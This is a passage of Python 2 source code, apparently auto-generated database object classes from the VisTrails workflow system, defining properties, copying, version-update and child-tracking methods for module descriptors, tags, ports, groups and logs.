cp.db_portSpecs_id_index = dict((v.db_id, v) for v in cp._db_portSpecs)
cp.db_portSpecs_name_index = dict(((v.db_name,v.db_type), v) for v in cp._db_portSpecs)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBModuleDescriptor()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'package' in class_dict:
res = class_dict['package'](old_obj, trans_dict)
new_obj.db_package = res
elif hasattr(old_obj, 'db_package') and old_obj.db_package is not None:
new_obj.db_package = old_obj.db_package
if 'namespace' in class_dict:
res = class_dict['namespace'](old_obj, trans_dict)
new_obj.db_namespace = res
elif hasattr(old_obj, 'db_namespace') and old_obj.db_namespace is not None:
new_obj.db_namespace = old_obj.db_namespace
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'base_descriptor_id' in class_dict:
res = class_dict['base_descriptor_id'](old_obj, trans_dict)
new_obj.db_base_descriptor_id = res
elif hasattr(old_obj, 'db_base_descriptor_id') and old_obj.db_base_descriptor_id is not None:
new_obj.db_base_descriptor_id = old_obj.db_base_descriptor_id
if 'portSpecs' in class_dict:
res = class_dict['portSpecs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_portSpec(obj)
elif hasattr(old_obj, 'db_portSpecs') and old_obj.db_portSpecs is not None:
for obj in old_obj.db_portSpecs:
new_obj.db_add_portSpec(DBPortSpec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_portSpecs') and hasattr(new_obj, 'db_deleted_portSpecs'):
for obj in old_obj.db_deleted_portSpecs:
n_obj = DBPortSpec.update_version(obj, trans_dict)
new_obj.db_deleted_portSpecs.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_portSpecs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_portSpec(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_portSpecs)
if remove:
self.db_deleted_portSpecs = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_portSpecs:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_package(self):
return self._db_package
def __set_db_package(self, package):
self._db_package = package
self.is_dirty = True
db_package = property(__get_db_package, __set_db_package)
def db_add_package(self, package):
self._db_package = package
def db_change_package(self, package):
self._db_package = package
def db_delete_package(self, package):
self._db_package = None
def __get_db_namespace(self):
return self._db_namespace
def __set_db_namespace(self, namespace):
self._db_namespace = namespace
self.is_dirty = True
db_namespace = property(__get_db_namespace, __set_db_namespace)
def db_add_namespace(self, namespace):
self._db_namespace = namespace
def db_change_namespace(self, namespace):
self._db_namespace = namespace
def db_delete_namespace(self, namespace):
self._db_namespace = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_base_descriptor_id(self):
return self._db_base_descriptor_id
def __set_db_base_descriptor_id(self, base_descriptor_id):
self._db_base_descriptor_id = base_descriptor_id
self.is_dirty = True
db_base_descriptor_id = property(__get_db_base_descriptor_id, __set_db_base_descriptor_id)
def db_add_base_descriptor_id(self, base_descriptor_id):
self._db_base_descriptor_id = base_descriptor_id
def db_change_base_descriptor_id(self, base_descriptor_id):
self._db_base_descriptor_id = base_descriptor_id
def db_delete_base_descriptor_id(self, base_descriptor_id):
self._db_base_descriptor_id = None
def __get_db_portSpecs(self):
return self._db_portSpecs
def __set_db_portSpecs(self, portSpecs):
self._db_portSpecs = portSpecs
self.is_dirty = True
db_portSpecs = property(__get_db_portSpecs, __set_db_portSpecs)
def db_get_portSpecs(self):
return self._db_portSpecs
def db_add_portSpec(self, portSpec):
self.is_dirty = True
self._db_portSpecs.append(portSpec)
self.db_portSpecs_id_index[portSpec.db_id] = portSpec
self.db_portSpecs_name_index[(portSpec.db_name,portSpec.db_type)] = portSpec
def db_change_portSpec(self, portSpec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_portSpecs)):
if self._db_portSpecs[i].db_id == portSpec.db_id:
self._db_portSpecs[i] = portSpec
found = True
break
if not found:
self._db_portSpecs.append(portSpec)
self.db_portSpecs_id_index[portSpec.db_id] = portSpec
self.db_portSpecs_name_index[(portSpec.db_name,portSpec.db_type)] = portSpec
def db_delete_portSpec(self, portSpec):
self.is_dirty = True
for i in xrange(len(self._db_portSpecs)):
if self._db_portSpecs[i].db_id == portSpec.db_id:
if not self._db_portSpecs[i].is_new:
self.db_deleted_portSpecs.append(self._db_portSpecs[i])
del self._db_portSpecs[i]
break
del self.db_portSpecs_id_index[portSpec.db_id]
del self.db_portSpecs_name_index[(portSpec.db_name,portSpec.db_type)]
def db_get_portSpec(self, key):
for i in xrange(len(self._db_portSpecs)):
if self._db_portSpecs[i].db_id == key:
return self._db_portSpecs[i]
return None
def db_get_portSpec_by_id(self, key):
return self.db_portSpecs_id_index[key]
def db_has_portSpec_with_id(self, key):
return key in self.db_portSpecs_id_index
def db_get_portSpec_by_name(self, key):
return self.db_portSpecs_name_index[key]
def db_has_portSpec_with_name(self, key):
return key in self.db_portSpecs_name_index
def getPrimaryKey(self):
return self._db_id
class DBTag(object):
vtType = 'tag'
def __init__(self, id=None, name=None):
self._db_id = id
self._db_name = name
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBTag.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBTag(id=self._db_id,
name=self._db_name)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_id') and ('action', self._db_id) in id_remap:
cp._db_id = id_remap[('action', self._db_id)]
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBTag()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def getPrimaryKey(self):
return self._db_id
class DBPort(object):
vtType = 'port'
def __init__(self, id=None, type=None, moduleId=None, moduleName=None, name=None, signature=None):
self._db_id = id
self._db_type = type
self._db_moduleId = moduleId
self._db_moduleName = moduleName
self._db_name = name
self._db_signature = signature
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBPort.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBPort(id=self._db_id,
type=self._db_type,
moduleId=self._db_moduleId,
moduleName=self._db_moduleName,
name=self._db_name,
signature=self._db_signature)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_moduleId') and ('module', self._db_moduleId) in id_remap:
cp._db_moduleId = id_remap[('module', self._db_moduleId)]
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBPort()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'type' in class_dict:
res = class_dict['type'](old_obj, trans_dict)
new_obj.db_type = res
elif hasattr(old_obj, 'db_type') and old_obj.db_type is not None:
new_obj.db_type = old_obj.db_type
if 'moduleId' in class_dict:
res = class_dict['moduleId'](old_obj, trans_dict)
new_obj.db_moduleId = res
elif hasattr(old_obj, 'db_moduleId') and old_obj.db_moduleId is not None:
new_obj.db_moduleId = old_obj.db_moduleId
if 'moduleName' in class_dict:
res = class_dict['moduleName'](old_obj, trans_dict)
new_obj.db_moduleName = res
elif hasattr(old_obj, 'db_moduleName') and old_obj.db_moduleName is not None:
new_obj.db_moduleName = old_obj.db_moduleName
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'signature' in class_dict:
res = class_dict['signature'](old_obj, trans_dict)
new_obj.db_signature = res
elif hasattr(old_obj, 'db_signature') and old_obj.db_signature is not None:
new_obj.db_signature = old_obj.db_signature
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_type(self):
return self._db_type
def __set_db_type(self, type):
self._db_type = type
self.is_dirty = True
db_type = property(__get_db_type, __set_db_type)
def db_add_type(self, type):
self._db_type = type
def db_change_type(self, type):
self._db_type = type
def db_delete_type(self, type):
self._db_type = None
def __get_db_moduleId(self):
return self._db_moduleId
def __set_db_moduleId(self, moduleId):
self._db_moduleId = moduleId
self.is_dirty = True
db_moduleId = property(__get_db_moduleId, __set_db_moduleId)
def db_add_moduleId(self, moduleId):
self._db_moduleId = moduleId
def db_change_moduleId(self, moduleId):
self._db_moduleId = moduleId
def db_delete_moduleId(self, moduleId):
self._db_moduleId = None
def __get_db_moduleName(self):
return self._db_moduleName
def __set_db_moduleName(self, moduleName):
self._db_moduleName = moduleName
self.is_dirty = True
db_moduleName = property(__get_db_moduleName, __set_db_moduleName)
def db_add_moduleName(self, moduleName):
self._db_moduleName = moduleName
def db_change_moduleName(self, moduleName):
self._db_moduleName = moduleName
def db_delete_moduleName(self, moduleName):
self._db_moduleName = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_signature(self):
return self._db_signature
def __set_db_signature(self, signature):
self._db_signature = signature
self.is_dirty = True
db_signature = property(__get_db_signature, __set_db_signature)
def db_add_signature(self, signature):
self._db_signature = signature
def db_change_signature(self, signature):
self._db_signature = signature
def db_delete_signature(self, signature):
self._db_signature = None
def getPrimaryKey(self):
return self._db_id
class DBGroup(object):
vtType = 'group'
def __init__(self, id=None, workflow=None, cache=None, name=None, namespace=None, package=None, version=None, tag=None, location=None, functions=None, annotations=None):
self._db_id = id
self.db_deleted_workflow = []
self._db_workflow = workflow
self._db_cache = cache
self._db_name = name
self._db_namespace = namespace
self._db_package = package
self._db_version = version
self._db_tag = tag
self.db_deleted_location = []
self._db_location = location
self.db_deleted_functions = []
self.db_functions_id_index = {}
if functions is None:
self._db_functions = []
else:
self._db_functions = functions
for v in self._db_functions:
self.db_functions_id_index[v.db_id] = v
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
self.db_annotations_key_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_annotations_key_index[v.db_key] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBGroup.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBGroup(id=self._db_id,
cache=self._db_cache,
name=self._db_name,
namespace=self._db_namespace,
package=self._db_package,
version=self._db_version,
tag=self._db_tag)
if self._db_workflow is not None:
cp._db_workflow = self._db_workflow.do_copy()
if self._db_location is not None:
cp._db_location = self._db_location.do_copy(new_ids, id_scope, id_remap)
if self._db_functions is None:
cp._db_functions = []
else:
cp._db_functions = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_functions]
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
cp.db_functions_id_index = dict((v.db_id, v) for v in cp._db_functions)
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_annotations_key_index = dict((v.db_key, v) for v in cp._db_annotations)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBGroup()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'workflow' in class_dict:
res = class_dict['workflow'](old_obj, trans_dict)
new_obj.db_workflow = res
elif hasattr(old_obj, 'db_workflow') and old_obj.db_workflow is not None:
obj = old_obj.db_workflow
new_obj.db_add_workflow(DBWorkflow.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_workflow') and hasattr(new_obj, 'db_deleted_workflow'):
for obj in old_obj.db_deleted_workflow:
n_obj = DBWorkflow.update_version(obj, trans_dict)
new_obj.db_deleted_workflow.append(n_obj)
if 'cache' in class_dict:
res = class_dict['cache'](old_obj, trans_dict)
new_obj.db_cache = res
elif hasattr(old_obj, 'db_cache') and old_obj.db_cache is not None:
new_obj.db_cache = old_obj.db_cache
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'namespace' in class_dict:
res = class_dict['namespace'](old_obj, trans_dict)
new_obj.db_namespace = res
elif hasattr(old_obj, 'db_namespace') and old_obj.db_namespace is not None:
new_obj.db_namespace = old_obj.db_namespace
if 'package' in class_dict:
res = class_dict['package'](old_obj, trans_dict)
new_obj.db_package = res
elif hasattr(old_obj, 'db_package') and old_obj.db_package is not None:
new_obj.db_package = old_obj.db_package
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'tag' in class_dict:
res = class_dict['tag'](old_obj, trans_dict)
new_obj.db_tag = res
elif hasattr(old_obj, 'db_tag') and old_obj.db_tag is not None:
new_obj.db_tag = old_obj.db_tag
if 'location' in class_dict:
res = class_dict['location'](old_obj, trans_dict)
new_obj.db_location = res
elif hasattr(old_obj, 'db_location') and old_obj.db_location is not None:
obj = old_obj.db_location
new_obj.db_add_location(DBLocation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_location') and hasattr(new_obj, 'db_deleted_location'):
for obj in old_obj.db_deleted_location:
n_obj = DBLocation.update_version(obj, trans_dict)
new_obj.db_deleted_location.append(n_obj)
if 'functions' in class_dict:
res = class_dict['functions'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_function(obj)
elif hasattr(old_obj, 'db_functions') and old_obj.db_functions is not None:
for obj in old_obj.db_functions:
new_obj.db_add_function(DBFunction.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_functions') and hasattr(new_obj, 'db_deleted_functions'):
for obj in old_obj.db_deleted_functions:
n_obj = DBFunction.update_version(obj, trans_dict)
new_obj.db_deleted_functions.append(n_obj)
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
if self._db_location is not None:
children.extend(self._db_location.db_children((self.vtType, self.db_id), orphan))
if orphan:
self._db_location = None
to_del = []
for child in self.db_functions:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_function(child)
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_workflow)
children.extend(self.db_deleted_location)
children.extend(self.db_deleted_functions)
children.extend(self.db_deleted_annotations)
if remove:
self.db_deleted_workflow = []
self.db_deleted_location = []
self.db_deleted_functions = []
self.db_deleted_annotations = []
return children
def has_changes(self):
if self.is_dirty:
return True
if self._db_workflow is not None and self._db_workflow.has_changes():
return True
if self._db_location is not None and self._db_location.has_changes():
return True
for child in self._db_functions:
if child.has_changes():
return True
for child in self._db_annotations:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_workflow(self):
return self._db_workflow
def __set_db_workflow(self, workflow):
self._db_workflow = workflow
self.is_dirty = True
db_workflow = property(__get_db_workflow, __set_db_workflow)
def db_add_workflow(self, workflow):
self._db_workflow = workflow
def db_change_workflow(self, workflow):
self._db_workflow = workflow
def db_delete_workflow(self, workflow):
if not self.is_new:
self.db_deleted_workflow.append(self._db_workflow)
self._db_workflow = None
def __get_db_cache(self):
return self._db_cache
def __set_db_cache(self, cache):
self._db_cache = cache
self.is_dirty = True
db_cache = property(__get_db_cache, __set_db_cache)
def db_add_cache(self, cache):
self._db_cache = cache
def db_change_cache(self, cache):
self._db_cache = cache
def db_delete_cache(self, cache):
self._db_cache = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_namespace(self):
return self._db_namespace
def __set_db_namespace(self, namespace):
self._db_namespace = namespace
self.is_dirty = True
db_namespace = property(__get_db_namespace, __set_db_namespace)
def db_add_namespace(self, namespace):
self._db_namespace = namespace
def db_change_namespace(self, namespace):
self._db_namespace = namespace
def db_delete_namespace(self, namespace):
self._db_namespace = None
def __get_db_package(self):
return self._db_package
def __set_db_package(self, package):
self._db_package = package
self.is_dirty = True
db_package = property(__get_db_package, __set_db_package)
def db_add_package(self, package):
self._db_package = package
def db_change_package(self, package):
self._db_package = package
def db_delete_package(self, package):
self._db_package = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_tag(self):
return self._db_tag
def __set_db_tag(self, tag):
self._db_tag = tag
self.is_dirty = True
db_tag = property(__get_db_tag, __set_db_tag)
def db_add_tag(self, tag):
self._db_tag = tag
def db_change_tag(self, tag):
self._db_tag = tag
def db_delete_tag(self, tag):
self._db_tag = None
def __get_db_location(self):
return self._db_location
def __set_db_location(self, location):
self._db_location = location
self.is_dirty = True
db_location = property(__get_db_location, __set_db_location)
def db_add_location(self, location):
self._db_location = location
def db_change_location(self, location):
self._db_location = location
def db_delete_location(self, location):
if not self.is_new:
self.db_deleted_location.append(self._db_location)
self._db_location = None
def __get_db_functions(self):
return self._db_functions
def __set_db_functions(self, functions):
self._db_functions = functions
self.is_dirty = True
db_functions = property(__get_db_functions, __set_db_functions)
def db_get_functions(self):
return self._db_functions
def db_add_function(self, function):
self.is_dirty = True
self._db_functions.append(function)
self.db_functions_id_index[function.db_id] = function
def db_change_function(self, function):
self.is_dirty = True
found = False
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == function.db_id:
self._db_functions[i] = function
found = True
break
if not found:
self._db_functions.append(function)
self.db_functions_id_index[function.db_id] = function
def db_delete_function(self, function):
self.is_dirty = True
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == function.db_id:
if not self._db_functions[i].is_new:
self.db_deleted_functions.append(self._db_functions[i])
del self._db_functions[i]
break
del self.db_functions_id_index[function.db_id]
def db_get_function(self, key):
for i in xrange(len(self._db_functions)):
if self._db_functions[i].db_id == key:
return self._db_functions[i]
return None
def db_get_function_by_id(self, key):
return self.db_functions_id_index[key]
def db_has_function_with_id(self, key):
return key in self.db_functions_id_index
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
del self.db_annotations_key_index[annotation.db_key]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def db_get_annotation_by_key(self, key):
return self.db_annotations_key_index[key]
def db_has_annotation_with_key(self, key):
return key in self.db_annotations_key_index
def getPrimaryKey(self):
return self._db_id
class DBLog(object):
vtType = 'log'
def __init__(self, id=None, entity_type=None, version=None, name=None, last_modified=None, workflow_execs=None, machines=None, vistrail_id=None):
self._db_id = id
self._db_entity_type = entity_type
self._db_version = version
self._db_name = name
self._db_last_modified = last_modified
self.db_deleted_workflow_execs = []
self.db_workflow_execs_id_index = {}
if workflow_execs is None:
self._db_workflow_execs = []
else:
self._db_workflow_execs = workflow_execs
for v in self._db_workflow_execs:
self.db_workflow_execs_id_index[v.db_id] = v
self.db_deleted_machines = []
self.db_machines_id_index = {}
if machines is None:
self._db_machines = []
else:
self._db_machines = machines
for v in self._db_machines:
self.db_machines_id_index[v.db_id] = v
self._db_vistrail_id = vistrail_id
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBLog.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBLog(id=self._db_id,
entity_type=self._db_entity_type,
version=self._db_version,
name=self._db_name,
last_modified=self._db_last_modified,
vistrail_id=self._db_vistrail_id)
if self._db_workflow_execs is None:
cp._db_workflow_execs = []
else:
cp._db_workflow_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_workflow_execs]
if self._db_machines is None:
cp._db_machines = []
else:
cp._db_machines = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_machines]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_vistrail_id') and ('vistrail', self._db_vistrail_id) in id_remap:
cp._db_vistrail_id = id_remap[('vistrail', self._db_vistrail_id)]
# recreate indices and set flags
cp.db_workflow_execs_id_index = dict((v.db_id, v) for v in cp._db_workflow_execs)
cp.db_machines_id_index = dict((v.db_id, v) for v in cp._db_machines)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBLog()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'entity_type' in class_dict:
res = class_dict['entity_type'](old_obj, trans_dict)
new_obj.db_entity_type = res
elif hasattr(old_obj, 'db_entity_type') and old_obj.db_entity_type is not None:
new_obj.db_entity_type = old_obj.db_entity_type
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'last_modified' in class_dict:
res = class_dict['last_modified'](old_obj, trans_dict)
new_obj.db_last_modified = res
elif hasattr(old_obj, 'db_last_modified') and old_obj.db_last_modified is not None:
new_obj.db_last_modified = old_obj.db_last_modified
if 'workflow_execs' in class_dict:
res = class_dict['workflow_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_workflow_exec(obj)
elif hasattr(old_obj, 'db_workflow_execs') and old_obj.db_workflow_execs is not None:
for obj in old_obj.db_workflow_execs:
new_obj.db_add_workflow_exec(DBWorkflowExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_workflow_execs') and hasattr(new_obj, 'db_deleted_workflow_execs'):
for obj in old_obj.db_deleted_workflow_execs:
n_obj = DBWorkflowExec.update_version(obj, trans_dict)
new_obj.db_deleted_workflow_execs.append(n_obj)
if 'machines' in class_dict:
res = class_dict['machines'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_machine(obj)
elif hasattr(old_obj, 'db_machines') and old_obj.db_machines is not None:
for obj in old_obj.db_machines:
new_obj.db_add_machine(DBMachine.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_machines') and hasattr(new_obj, 'db_deleted_machines'):
for obj in old_obj.db_deleted_machines:
n_obj = DBMachine.update_version(obj, trans_dict)
new_obj.db_deleted_machines.append(n_obj)
if 'vistrail_id' in class_dict:
